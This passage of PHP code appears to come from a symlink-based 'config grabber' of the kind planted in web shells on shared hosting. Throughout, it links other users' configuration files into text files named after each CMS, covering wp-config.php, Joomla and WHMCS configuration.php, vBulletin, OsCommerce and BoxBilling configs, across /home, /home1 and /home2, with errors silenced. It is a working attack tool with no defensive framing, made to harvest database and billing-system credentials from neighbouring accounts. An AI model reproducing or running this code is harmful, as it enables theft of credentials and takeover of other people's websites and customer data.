@symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt'); @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt'); //Home1 @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt'); @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt'); @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt'); @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt'); @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt'); //Home2 @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt'); @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt'); @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt'); @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt'); @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt'); @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt'); @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt'); @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt'); @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt'); @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt'); @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt'); @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt'); @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt'); @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt'); @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt'); @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt'); @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt'); @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt'); @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt'); @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt'); @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt'); 